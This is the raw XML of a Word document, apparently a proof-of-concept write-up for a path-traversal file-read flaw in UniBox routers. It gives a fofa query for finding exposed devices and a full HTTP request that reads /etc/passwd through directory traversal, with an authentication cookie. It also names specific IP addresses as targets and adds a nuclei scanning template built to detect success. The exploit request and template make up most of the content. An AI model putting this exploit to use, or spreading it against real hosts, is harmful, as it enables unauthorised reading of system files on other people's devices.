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13F309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1. Pages and fofa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1CC65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body="UniBox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF37683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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="4341495"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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C1A22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3947A833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2.POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F86C4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 /content-adoption/index-10Nov2013.php?calltype=payload&amp;url=/../../../../../../etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673F0E1A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Host: 103.53.75.116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DD4474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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255DDC83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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B419D78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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7F945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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60754A92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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7C305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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699FB2D8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Cookie: user=unibox; pass=294a3d333d2f6b7e121594189fce9a72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5879C4CF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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D08FA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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188A6F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717D811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3.testing site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898A0E9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"http://103.121.26.106"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http://103.121.26.106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0BEA7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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="2301875"/>
            <wp:effectExtent l="0" t="0" r="14605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414F1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4.nuclei</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757475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unibox-route-index-10Nov2013-fileread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C3A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42E85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1207C3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unibox-route-index-10Nov2013-fileread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB19C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unknow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A292B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high</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD180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unibox-route-index-10Nov2013-fileread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238A48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unibox,fileread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918A0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0E7C1D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fofa-qeury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body="UniBox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D84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veified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 w14:paraId="532874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max-request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</w:p>
    <w:p w14:paraId="66FCAE2A">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387A9D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1BE780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-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6A2E51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-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           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B953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GET /content-adoption/index-10Nov2013.php?calltype=payload&amp;url=/../../../../../../etc/passwd HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539EF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  Host: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A87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Pragma: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA363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Cache-Control: no-cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41CC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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0893B6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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085126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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE48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Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B08C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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3839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Cookie: user=unibox; pass=294a3d333d2f6b7e121594189fce9a72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FF38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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A59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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0886A2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matchers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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51C6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-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dsl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D3BB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sqli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9286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dsl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12ED0A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-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"status_code == 200 &amp;&amp; contains(body,'root:x')"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455244FF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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="420370"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1778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F7C6E"/>
    <w:rsid w:val="19D84869"/>
    <w:rsid w:val="322518E6"/>
    <w:rsid w:val="3D295AD3"/>
    <w:rsid w:val="510E7D88"/>
    <w:rsid w:val="51E11D57"/>
    <w:rsid w:val="762A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123</Words>
  <Characters>1589</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1861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2025-03-14T08:18:00Z</dcterms:created>
  <dc:creator>ZhuanZ</dc:creator>
  <cp:lastModifiedBy>Dog~</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-14T08:30:38Z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eyJoZGlkIjoiNWM1MWJkNWJiY2Q1NzJmZmRlMThjOTUwZWMxNmFkZjkiLCJ1c2VySWQiOiI5MTk5NDE2ODYifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>D21F6ADCC1CC457790B82EFC8ABCB0E7_12</vt:lpwstr>
  </property>
</Properties>
</file>